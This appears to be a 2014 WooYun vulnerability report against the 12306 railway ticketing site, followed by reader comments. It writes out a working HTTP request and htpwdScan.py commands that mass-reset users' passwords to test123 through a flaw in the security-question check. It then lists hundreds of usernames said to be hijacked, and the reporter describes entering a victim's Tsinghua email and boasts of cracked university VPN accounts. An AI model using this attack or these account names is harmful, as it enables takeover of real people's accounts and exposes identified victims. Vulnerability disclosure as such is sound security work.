演示12306批量重置密码漏洞(可修改多个用户密码)

编号63813
Urlhttp://www.wooyun.org/bug.php?action=view&id=63813
漏洞状态厂商已经修复
漏洞标题演示12306批量重置密码漏洞(可修改多个用户密码)
漏洞类型设计缺陷/逻辑错误
厂商中国铁道科学研究院
白帽子lijiejie
提交日期2014-06-06 21:13:00
公开日期2014-06-11 14:41:00
修复时间2014-06-11 14:41:00
确认时间2014-06-09 00:00:00
Confirm Spend3
漏洞标签逻辑缺陷
关注数0
收藏数0
白帽评级
白帽自评rank16
厂商评级
厂商评rank4
漏洞简介
之前提给12306的漏洞被忽略了:http://www.wooyun.org/bugs/wooyun-2014-063025,哥还是详细演示下利用方法吧。。。 
漏洞细节

利用之前ping一下kyfw.12306.cn,然后修改hosts,固定解析到该IP。
POST:

POST /otn/forgetPassword/findPasswordByPromptAnswer HTTP/1.1
Host: kyfw.12306.cn
Connection: keep-alive
Content-Length: 228
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://kyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0A1E82A1441AF4843295A39FF9A11E51; BIGipServerotn=2362704138.38945.0000
userDTO.loginUserDTO.user_name=anfeng&userDTO.pwd_question=%E6%82%A8%E7%9A%84%E5%87%BA%E7%94%9F%E5%9C%B0%E6%98%AF%EF%BC%9F&userDTO.pwd_answer=%E4%B8%8A%E6%B5%B7&userDTO.password_new=test123&confirmPassWord=test123&randCodes=u6hc


其中session id和randCodes根据自己的值修改即可。
下载哥写的脚本(http://www.lijiejie.com/htpwdscan-http-weakpass-scanner/),分别执行:

htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=pinyin2.txt -err=existError\":\"Y -debug


htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=C:/cygwin/home/pinyin2.txt -err=existError\":\"Y -o=12306.txt


在12306.txt中,你可以得到密码已经被修改为test123的用户们。
上面的HTTP请求中,可以为答案设置额外的字典。

POC

以下账号密码都被修改为test123,不信你试几个?

aidong
anfeng
banbing
bangka
baoquan
bianfang
binger
caituo
caizhi
caorun
chaifang
changyan
chaoang
chaowei
chendiu
chenning
chensi
chengna
chonglai
chuaizhuo
chuandan
conghua
cuanzheng
cuixing
cuizhou
daidong
dequan
dengyang
diexian
douniang
dugong
duangang
dunpai
fanlei
feigeng
douzhuo
gainai
gaishu
gangqin
gening
geixiao
genneng
gongnei
guainian
guaizhe
guanshuang
guangpin
nuanxiao
paizhang
pangai
panlei
pangai
pangshe
paogao
peizhi
pinsan
qianduan
qieshuang
qingneng
qiujing
quliang
quemei
quexin
qundao
ranjing
renmin
rilang
rongzhai
rouran
ruanlei
ruannan
sanshou
shaleng
shaiyan
shangdao
shangji
shaohong
shenping
shenshuo
shigun
shijia
shijing
shudun
shuxin
shuagun
shunshai
songan
suibian
sunjin
sunjing
suogua
tangxiong
tianma
tingleng
tongdian
tuibian
tuirong
waizhan
wanchen
wangrong
weinei
wenlan
xianglong
xiaofei
xiaoqin
xiaosa
xiaosong
xiechong
xinggu
xingzang
xiongfang
xiongkai
xiupao
xiuzuo
xuanli
xunxun
yajing
yanchen
yangsa
yaoyun
yilang
yinmei
youhang
yuangeng
yueyong
zancheng
zangnuo
zaoling
zhaili
zhaizang
zhaokuan
zhaoying
zhengeng
zhengjin
zhipian
zhongshui
zhubiao
zhuyuan
zhuawo
zhuaichu
zhuanghong
zongcai
zongnuo
zouying
zuzheng
zuolou
zuosha
bantan
benqiao
biaoneng
binqian
bingdui
bochui
boqing
cangjia
chajie
chaqin
chanxun
chefeng
chenyin
chengfu
chengliu
chixiang
chulia
chuping
chuzhuang
chuangchu
cichan
ciling
cuiniao
daigang
daipin
danjin
danglei
deiseng
dengfu
dengzhou
dielao
diemei
dinglin
dinglu
dingpan
dingyue
duhuai
duming
duanzhao
duotuan
enseng
fanghai
feichen
fenghong
fenglei
foguang
fufang
gennie
guasan
guaiha
guanyue
haqing
haxiao
hanchui
hanghao
hangzhen
heiqia
hentong
hongtian
houbin
hujiong
huading
huangfang
huanglei
huangli
huogong
jiping
jiareng
jiangqiang
jiaochu
jiehua
jiepan
jieying
jinpie
jinren
jingchuan
jiongbai
jiongxu
juchai
juanfang
jueruan
kanmin
kangrun
kaoshi
kaosun
kaowen
kejian
kekong
kengshen
kuaiying
kuikai
kuipin
landie
lanmie
lanseng
laomai
leiqiu
leixia
lenghai
liamin
liaqiong
lianfu
linnei
liuzhang
loujue
luqing
lushen
maigang
mehuan
meiwang
mengun
mengbai
mengda
mengren
mieduan
mindong
naidao
nanlan
nanrong
nengniu
niaorong
nieling
ningde
nongzhang
nuoliang
oushou
paiyao
pangceng
pangniang
pangwu
pishen
pinqiao
qiahua
qianshu
qiaojiong
qinxun
qingsuo
qiongfa
qiongge
qiuran
quanjiao
quepeng
quetong
qunkang
rexuan
renqian
rengren
rongxu
rouzhou
ruanmin
ruoshun
shaqing
shazhong
shanhai
shanlian
shanshuang
shanxun
shaoyin
shendian
shennan
shensuan
shengjun
shihuan
shihua
shinei
shujiu
shuaxiong
shuima
shunjing
taikui
tenggang
tengyong
tizheng
tiewang
tongnuo
tongshan
tuixiu
tuoren
waichou
wanping
weihong
weishei
wensuo
woseng
xiashun
xiannian
xiantu
xiangma
xiaoling
xieming
xingzhong
yanyin
yaosang
yingcai
yinggong
yingnong
youmei
yunniu
yunpian
zaidou
zaijiao
zaoshen
zeifang
zeishui
zenning
zhashe
zhaozhong
zhegen
zhenzen
zhibang
zhihua
zhihao
zhuzhong
zhuachen
zhuangchun
zhuangye
zongjun
zongzong
zunkun


我随便挑了个账号进去看(对天发誓,中间随便挑的),一看,居然是清华邮箱啊。 随手拿电话号登录邮箱,轻轻松松登录进入了,额。。。 鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了

12306_info.png


tsinghua_mail.png


修复方案

你们更专业

状态信息 2014-06-06: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-11: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复谢谢
回应信息危害等级:低漏洞Rank:4 确认时间:2014-06-09 08:24
Showing 1-28 of 28 items.
评论内容评论人点赞数评论时间

这打码打得……肉眼都能看见啊……

StarBrilliant02014-07-12 12:56:00

no zuo no die why you try

芙兰朵露斯卡雷特02014-07-01 15:04:00

楼主 做等水表了

hawkeye02014-06-28 17:00:00

@Doze 可以看出,他们并不很重视用户的信息和数据

lijiejie02014-06-28 09:40:00

test123 还可用

Doze02014-06-28 08:08:00

学习学习

蛋碎酱油02014-06-23 16:05:00

咚咚咚 开门 社区送温暖

西顾02014-06-19 15:07:00

关键是这些帐号的密码还是 test123

IT偏执狂02014-06-19 11:15:00

清华的数据库给拖了* 但是很多都不是核心的 lz进入主干的节奏?

Lee Swagger02014-06-14 00:10:00

关键是这些帐号的密码还是 test123

zhangjie02014-06-12 10:44:00

鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了

小杰哥02014-06-11 21:09:00

鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了

xsjswt02014-06-11 16:48:00

不要跟12306谈安全

luwikes02014-06-11 16:25:00

good..

风之传说02014-06-11 16:10:00

下次拿北大开刀

深蓝02014-06-11 15:56:00

原理是什么

计算姬02014-06-11 15:42:00

你们怎么都喜欢拿清华开刀,还把学生数据拖了好几遍,太过分了,shell都不分享

动后河02014-06-11 15:16:00

“ 鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了” ……洞主小心水表……

小森森02014-06-11 15:03:00

楼主出门的时候 穿好防弹衣 戴好头盔神马的

nony02014-06-11 14:56:00

楼主,打人是不打脸的,低调

B1acken02014-06-07 11:36:00

洞主这是作死的节奏啊,这不是给12306查水表的借口吗。

小杰02014-06-07 09:03:00

楼主不拿rank不死心啊

李旭敏02014-06-06 23:47:00

欢迎打脸。。

zeracker02014-06-06 22:49:00

坐等学习思路……

Siro02014-06-06 21:57:00

奖励春运火车票一张

迦南02014-06-06 21:36:00

楼下如何看?

野驴~02014-06-06 21:36:00

top~

袋鼠妈妈02014-06-06 21:20:00

mark

VIP02014-06-06 21:17:00